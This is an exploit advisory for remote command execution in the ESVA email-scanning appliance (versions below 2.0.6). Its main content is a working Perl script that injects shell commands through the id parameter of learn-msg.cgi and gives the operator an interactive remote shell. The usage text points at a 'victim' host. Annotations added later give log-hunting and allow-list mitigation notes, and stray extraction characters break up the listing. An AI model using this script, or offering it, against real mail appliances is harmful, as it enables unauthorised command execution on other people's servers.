# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution.
|
|
# Date: 10 Aug 2012
|
|
# Exploit Author: iJoo
|
|
# Vendor Homepage: http://www.esvacommunity.com/
|
|
# Software Link: http://sourceforge.net/projects/esva-project/
|
|
# Version: < 2.0.6
|
|
|
|
ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, Server, Player or ESX Server.
|
|
|
|
-=+ Affected Files
|
|
|
|
..../cgi-bin/learn-msg.cgi
|
|
..../cgi-bin/release-msg.cgi
|
|
|
|
No stripping or filtering of shell metacharacters was found in these scripts.
|
|
As a result, an attacker can easily execute commands.
|
|
|
|
-=+ Simple RCE ESVA
|
|
|
|
#! /usr/bin/perl
|
|
use LWP;
|
|
use HTTP::Request;
|
|
# Usage guard: when no host argument is supplied, print the banner and the
# usage text, then exit without making any request.
# NOTE(review): the bare `|` lines interleaved through this listing are
# page-extraction residue, not Perl; they are kept here only because the
# listing is reproduced verbatim.
if (@ARGV < 1)
|
|
{
|
|
print "\n==========================================\n";
|
|
print " ESVA - REMOTE EXECUTION SCRIPT \n";
|
|
print "==========================================\n";
|
|
# The host is expected without a scheme; the request line further down
# prepends "http://" itself.
print "Usage: perl esva.pl host (without http://)\n";
|
|
print "Ex. perl esva.pl www.korban.com\n";
|
|
exit;
|
|
}
|
|
# Interactive loop: read a line from STDIN, send it to the appliance's
# learn-msg.cgi inside the `id` query parameter, print the HTTP response body,
# and repeat.
# NOTE(review): the script declares no `use strict` / `use warnings`; every
# variable below is an undeclared package global.
# The host is taken verbatim from the first command-line argument.
$host=$ARGV[0];
|
|
print "Try to Execution Command!\n";
|
|
print "iDSc-shell# ";
|
|
chomp( $cmd = <STDIN>);
|
|
# The string "exit" is applied as a regex, so the loop ends on any input that
# merely contains "exit", not only on the exact word.
while($cmd !~ "exit")
|
|
{
|
|
$content = "";
|
|
# A fresh LWP::UserAgent is created on every iteration.
$ua = LWP::UserAgent->new();
|
|
# The User-Agent string is set to empty. Defender note: requests to the ESVA
# CGI paths with a blank User-Agent are a reasonable log-hunting signal;
# confirm what actually appears in your access logs.
$ua->agent('');
|
|
# Request shape: GET /cgi-bin/learn-msg.cgi?id=<%7c><input><%3b>, where %7c and
# %3b are the URL-encoded `|` and `;`. The advisory text attributes the issue
# to missing metacharacter filtering in learn-msg.cgi and release-msg.cgi; the
# CGI source itself is not shown on this page.
# Detection: look in web-server access logs for requests to either CGI whose
# `id` value contains %7c, %3b, or other shell metacharacters.
# Mitigation: the header lists versions below 2.0.6 as affected. Independently
# of version, the CGI should accept `id` only if it matches a strict allow-list
# pattern and should never pass it to a shell.
$request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b");
|
|
$response = $ua->request ($request);
|
|
# The body is printed whatever the HTTP status; success or failure of the
# request is never checked.
$content = $response->content;
|
|
print $content."\n";
|
|
print "iDSc-shell# ";
|
|
chomp( $cmd = <STDIN>);
|
|
}
|
|
|
|
-=+ Thanks to
|
|
My lovely Country NKRI INDONESIA!!
|
|
binh4x staff - www.binushacker.net // Forum.binushacker.net |